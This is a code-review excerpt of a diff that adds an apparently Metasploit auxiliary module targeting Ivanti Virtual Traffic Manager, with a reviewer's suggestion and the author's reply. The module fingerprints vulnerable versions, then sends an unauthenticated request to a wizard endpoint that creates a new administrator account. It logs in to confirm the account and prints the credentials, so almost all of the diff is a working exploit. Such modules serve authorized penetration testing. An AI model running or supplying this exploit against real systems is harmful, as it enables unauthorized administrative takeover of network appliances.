modules/auxiliary/admin/http/ivanti_vtm_admin.rb

```diff
@@ -0,0 +1,127 @@
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username.gsub('.', '_')]),
+      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(12)]),
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'apps', 'zxtm', 'login.cgi')
+      }
+    )
+
+    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+
+    body = res.body
+    version_regex = /StingrayVersion\.Set\(\s*'([^']+)'\s*,/
+    match = body.match(version_regex)
+    if match
+      version = match[1]
+      return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('22.7R1')
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def run
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers'),
+      'vars_post' => {
+        '_form_submitted' => 'form',
+        'create_user' => 'Create',
+        'group' => 'admin',
+        'newusername' => datastore['NEW_USERNAME'],
+        'password1' => datastore['NEW_PASSWORD'],
+        'password2' => datastore['NEW_PASSWORD']
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    html = res.get_html_document
+    title_tag = html.at_css('title')
+
+    if title_tag
+      title_text = title_tag.text.strip
+      if title_text == '2'
+        print_status('Request to add new admin user sent, verifying...')
+
+        form = Rex::MIME::Message.new
+        form.add_part('form', nil, nil, 'form-data; name="_form_submitted"')
+        form.add_part(datastore['NEW_USERNAME'], nil, nil, 'form-data; name="form_username"')
+        form.add_part(datastore['NEW_PASSWORD'], nil, nil, 'form-data; name="form_password"')
+        form.add_part('Login', nil, nil, 'form-data; name="form_submit"')
+
+        res = send_request_cgi(
+          {
+            'method' => 'POST',
+            'uri' => normalize_uri(target_uri.path, 'apps', 'zxtm', 'login.cgi'),
+            'ctype' => "multipart/form-data; boundary=#{form.bound}",
+            'data' => form.to_s
+          }
+        )
+        if res && res.code == 302 && res.get_cookies.include?('ZeusTMZAUTH_')
+          store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
+          print_good("New admin user was successfully added:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
+          print_good("Login at: https://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}apps/zxtm/login.cgi")
```

Comment:
```suggestion
          print_good("Login at: #{full_uri(normalize_uri(target_uri, 'apps/zxtm/login.cgi'))}")
```
I _think_ you can get the full uri from the http client mixin this way

Reply:
Yes, that works, thank you.